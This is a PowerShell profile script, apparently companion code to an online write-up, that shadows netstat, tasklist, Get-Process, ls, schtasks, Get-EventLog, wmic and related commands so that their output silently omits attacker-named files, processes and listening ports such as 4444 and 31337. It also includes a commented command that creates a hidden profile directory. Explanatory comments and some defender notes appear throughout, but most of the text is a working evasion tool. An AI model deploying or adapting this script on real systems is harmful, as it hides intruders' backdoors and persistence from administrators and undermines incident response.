PowerShell profile.ps1 for evading Netstat, Tasklist, Get-EventLog, Schtasks, etc
# write-up: https://null-byte.com/powershell-evasion-0329395/ | |
# create the profile.ps1 directory if it doesn't exist | |
# cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden" | |
# processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1 | |
# Regex alternation consumed by the Select-String -notmatch filters in the function
# wrappers below. It is matched unanchored against whole output lines, so any line
# that merely contains one of these substrings (a process name, a path fragment, an
# event message) is dropped from the wrapped command's output.
$excludeFiles = "payload|evil|tokyoneon" | |
# listening ports and PIDs to exclude | |
# Same mechanism for port / PID tokens. Because the match is a plain substring regex,
# "4444" also suppresses lines for unrelated values such as 44440 or a PID that
# happens to contain the digits.
$excludePorts = "4444|1337|31337|55555" | |
# Shadows the native netstat command for any PowerShell session that loads this
# profile: a function defined in profile.ps1 wins command lookup over netstat.exe on
# PATH. The real binary runs in a child powershell.exe started with -NoProfile (so
# this profile, and therefore this function, are not loaded again in the child), and
# every output line matching the $excludePorts regex is removed by Select-String
# -notmatch. $args is interpolated into one command string for -c, so the child
# shell re-parses the arguments. Defender notes: the child process command line
# (powershell.exe -NoProfile -c "netstat.exe ...") is what process-creation
# telemetry records, and sessions started with -NoProfile, or tools invoked by full
# path, are not affected by this wrapper.
function netstat { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" } | |
# Same wrapper as the `netstat` function, registered under the name with the
# extension so that callers who type "netstat.exe" explicitly also hit the filter.
# Output lines matching $excludePorts are dropped; everything else passes through.
function netstat.exe { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" } | |
# Shadows the Get-Process cmdlet in this session. The cmdlet is run in a -NoProfile
# child and its formatted text output is filtered with $excludeFiles, so the caller
# receives Select-String results (text lines) rather than Process objects -- a
# detectable difference from the real cmdlet for any script that inspects the
# output type.
function Get-Process { powershell.exe -NoProfile -c "Get-Process $args" | Select-String -notmatch "$excludeFiles" } | |
# Covers the `ps` alias of Get-Process with the same -NoProfile child + text filter
# on $excludeFiles; the alias must be shadowed separately because the function
# above only replaces the cmdlet name, not its aliases.
function ps { powershell.exe -NoProfile -c "ps $args" | Select-String -notmatch "$excludeFiles" } | |
# Shadows tasklist: runs the real tasklist.exe in a -NoProfile child and drops every
# output line containing a token from $excludeFiles. The filter is substring based,
# so a column value that merely contains one of the tokens is enough to hide the row.
function tasklist { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" } | |
# Same as the `tasklist` function, registered under the explicit .exe name.
function tasklist.exe { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" } | |
# Shadows the `ls` alias of Get-ChildItem: directory listings are produced by a
# -NoProfile child and lines containing a $excludeFiles token are removed. Only the
# text rendering is filtered; the files themselves are untouched and remain visible
# to any tool that does not go through this session's command lookup.
function ls { powershell.exe -NoProfile -c "ls $args" | Select-String -notmatch "$excludeFiles" } | |
# Same text filter as the `ls` function, applied to the Get-ChildItem cmdlet name.
# Returns Select-String results instead of FileInfo/DirectoryInfo objects.
function Get-ChildItem { powershell.exe -NoProfile -c "Get-ChildItem $args" | Select-String -notmatch "$excludeFiles" } | |
# Shadows schtasks: the real schtasks.exe runs in a -NoProfile child and output
# lines containing a $excludeFiles token are dropped. Note the filter keys on the
# file-name list, not $excludePorts.
function schtasks { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" } | |
# Same as the `schtasks` function, registered under the explicit .exe name.
function schtasks.exe { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" } | |
# Shadows Get-EventLog and filters its text output against both regexes joined with
# "|", so a line is dropped if it contains either a file-name token or a port/PID
# token. The underlying event log records are not modified -- only this session's
# rendered output is trimmed, and the child powershell.exe invocation is itself
# recorded by process-creation logging.
function Get-EventLog { powershell.exe -NoProfile -c "Get-EventLog $args" | Select-String -notmatch "$excludeFiles|$excludePorts" } | |
# Shadows wmic with the combined $excludeFiles|$excludePorts filter. The trailing
# Where-Object (`?`) compares each Select-String result with "" -- apparently meant
# to drop the blank lines wmic emits; whether a MatchInfo object compares equal to
# an empty string is not established here, so treat that stage as best-effort.
function wmic { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} } | |
# Same as the `wmic` function, registered under the explicit .exe name.
function wmic.exe { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} } |